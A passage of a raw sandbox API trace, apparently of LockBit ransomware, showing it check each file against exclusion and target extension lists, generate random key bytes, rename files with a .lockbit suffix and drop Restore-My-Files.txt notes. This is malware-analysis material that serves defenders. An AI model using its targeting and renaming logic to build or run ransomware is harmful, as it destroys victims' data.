ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbc847960, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8d9c300, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x97e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10256_.GIF", cAlternateFileName="")) returned 1 [0205.670] lstrcmpiW (lpString1=".", lpString2="BD10256_.GIF") returned -1 [0205.670] lstrcmpiW (lpString1="..", lpString2="BD10256_.GIF") returned -1 [0205.670] PathFindExtensionW (pszPath="BD10256_.GIF") returned=".GIF" [0205.670] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.670] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.670] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10256_.GIF") returned 1 [0205.671] lstrcmpiW (lpString1="ntldr", lpString2="BD10256_.GIF") returned 1 [0205.671] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10256_.GIF") returned 1 [0205.671] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10256_.GIF") returned 1 [0205.671] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10256_.GIF") returned -1 [0205.671] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10256_.GIF") returned 1 [0205.671] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10256_.GIF") returned 1 [0205.671] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF") returned=".GIF" [0205.671] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.671] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.671] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.672] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.672] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.672] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.672] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.672] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.672] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.672] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.672] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF.lockbit") returned 76 [0205.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10256_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.673] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.673] malloc (_Size=0x40068) returned 0x3df0008 [0205.673] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2430) returned 1 [0205.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.674] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.678] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.678] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.678] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0205.679] free (_Block=0x1fa2ed8) [0205.679] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10256_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.679] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.679] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.679] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e031400, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc893c20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6e031400, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10289_.GIF", cAlternateFileName="")) returned 1 [0205.679] lstrcmpiW (lpString1=".", lpString2="BD10289_.GIF") returned -1 [0205.679] lstrcmpiW (lpString1="..", lpString2="BD10289_.GIF") returned -1 [0205.679] PathFindExtensionW (pszPath="BD10289_.GIF") returned=".GIF" [0205.679] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.679] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.680] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.680] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.681] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10289_.GIF") returned 1 [0205.681] lstrcmpiW (lpString1="ntldr", lpString2="BD10289_.GIF") returned 1 [0205.681] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10289_.GIF") returned 1 [0205.681] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10289_.GIF") returned 1 [0205.681] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10289_.GIF") returned -1 [0205.681] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10289_.GIF") returned 1 [0205.681] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10289_.GIF") returned 1 [0205.681] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.681] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF") returned=".GIF" [0205.681] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.681] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.682] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.682] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.682] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF.lockbit") returned 76 [0205.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10289_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0205.684] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.684] malloc (_Size=0x40068) returned 0x1ff1e60 [0205.684] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=292) returned 1 [0205.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.685] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0205.685] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.685] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0205.685] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0205.689] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.689] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.689] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.689] free (_Block=0x1fa2ed8) [0205.689] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10289_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.689] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.689] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e031400, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc893c20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6e031400, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x134, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10290_.GIF", cAlternateFileName="")) returned 1 [0205.689] lstrcmpiW (lpString1=".", lpString2="BD10290_.GIF") returned -1 [0205.689] lstrcmpiW (lpString1="..", lpString2="BD10290_.GIF") returned -1 [0205.689] PathFindExtensionW (pszPath="BD10290_.GIF") returned=".GIF" [0205.689] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.689] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.689] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.689] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.689] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.689] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.689] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.690] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.690] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.691] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10290_.GIF") returned 1 [0205.691] lstrcmpiW (lpString1="ntldr", lpString2="BD10290_.GIF") returned 1 [0205.691] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10290_.GIF") returned 1 [0205.691] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10290_.GIF") returned 1 [0205.691] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10290_.GIF") returned -1 [0205.691] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10290_.GIF") returned 1 [0205.691] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10290_.GIF") returned 1 [0205.691] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.691] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF") returned=".GIF" [0205.691] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.691] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.691] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.692] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.692] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.692] lstrcmpiW (lpString1=".mwb", 